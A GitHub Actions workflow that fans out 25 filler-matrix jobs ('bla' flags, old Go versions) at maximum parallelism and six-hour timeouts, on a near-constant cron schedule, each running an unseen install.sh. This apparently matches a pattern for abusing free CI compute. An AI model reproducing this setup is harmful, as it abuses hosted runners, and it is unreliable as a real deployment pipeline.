name: Deploy
on:  
  push:
  pull_request:
  schedule:
    - cron: '* */6 * * *'
jobs:
  build:
    name: Hayuk_Meluncur
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 50
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5]
        flag: [bla, bla2, bla3, bla4, bla5]
    timeout-minutes: 360
    env:
        NUM_JOBS: 50
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        chmod +x "${GITHUB_WORKSPACE}/install.sh"
        "${GITHUB_WORKSPACE}/install.sh"
